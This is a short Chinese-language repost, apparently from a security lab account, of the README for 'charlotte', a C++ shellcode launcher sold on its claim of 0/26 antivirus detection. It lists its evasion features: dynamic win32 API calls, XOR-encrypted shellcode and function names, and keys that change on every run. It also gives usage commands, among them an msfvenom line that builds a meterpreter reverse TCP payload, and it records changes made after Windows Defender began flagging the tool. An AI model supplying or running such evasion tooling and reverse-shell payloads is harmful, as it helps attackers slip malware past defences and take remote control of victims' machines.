文章来源: Khan安全攻防实验室
2021年5月13日:
c ++ shellcode启动器,截至2021年5月13日完全未检测到0/26。
动态调用win32 api函数
Shellcode和函数名称的XOR加密
每次运行随机XOR键和变量
在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!
2021年5月17日:
1.随机字符串长度和XOR键长度
用法
git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py
例子:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
profit
2021/05/21:
显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。
项目地址:
https://github.com/9emin1/charlotte